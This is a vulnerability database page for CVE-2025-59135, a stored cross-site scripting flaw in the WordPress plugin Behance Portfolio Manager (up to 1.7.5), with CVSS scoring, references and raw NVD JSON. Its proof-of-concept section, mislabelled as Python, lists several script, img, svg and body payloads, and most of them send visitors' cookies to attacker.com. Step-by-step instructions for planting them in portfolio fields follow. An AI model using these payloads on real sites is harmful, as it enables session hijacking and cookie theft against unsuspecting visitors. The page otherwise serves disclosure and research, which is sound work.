CVE-2025-59135

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in eleopard Behance Portfolio Manager portfolio-manager-powered-by-behance allows Stored XSS.This issue affects Behance Portfolio Manager: from n/a through <= 1.7.5.

CVSS Details

CVSS Score

5.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Behance Portfolio Manager (portfolio-manager-powered-by-behance) <= 1.7.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-59135 Stored XSS PoC for Behance Portfolio Manager -->
<!-- Attack Vector: Inject malicious JavaScript via Portfolio content fields -->

<!-- Method 1: Using script tag -->
<script>alert(document.domain);document.location='https://attacker.com/steal?c='+document.cookie</script>

<!-- Method 2: Using img tag with onerror -->
<img src=x onerror="fetch('https://attacker.com/log?cookie='+btoa(document.cookie))">

<!-- Method 3: Using SVG tag -->
<svg/onload=fetch('https://attacker.com/exfil?data='+btoa(document.cookie))>

<!-- Method 4: Using event handlers -->
<body onload="fetch('https://attacker.com/steal?c='+document.cookie)">
<div onclick="window.location='https://attacker.com'" style="cursor:pointer">Click me</div>

<!-- To exploit: -->
<!-- 1. Login to WordPress admin panel -->
<!-- 2. Navigate to Behance Portfolio Manager settings -->
<!-- 3. Create or edit a Portfolio item -->
<!-- 4. Insert one of the above payloads into any text field (title, description, etc.) -->
<!-- 5. Save the Portfolio item -->
<!-- 6. When any user views the Portfolio page, the JavaScript will execute -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-59135
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-59135
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-59135/
[4] VulDB https://vuldb.com/cve/CVE-2025-59135
[5] https://patchstack.com/database/Wordpress/Plugin/portfolio-manager-powered-by-behance/vulnerability/wordpress-behance-portfolio-manager-plugin-1-7-5-cross-site-scripting-xss-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-59135", "sourceIdentifier": "[email protected]", "published": "2025-12-31T18:15:44.957", "lastModified": "2026-04-23T15:34:02.747", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in eleopard Behance Portfolio Manager portfolio-manager-powered-by-behance allows Stored XSS.This issue affects Behance Portfolio Manager: from n/a through <= 1.7.5."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en eLEOPARD Behance Portfolio Manager permite XSS Almacenado. Este problema afecta a Behance Portfolio Manager: desde n/d hasta 1.7.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.7, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/portfolio-manager-powered-by-behance/vulnerability/wordpress-behance-portfolio-manager-plugin-1-7-5-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}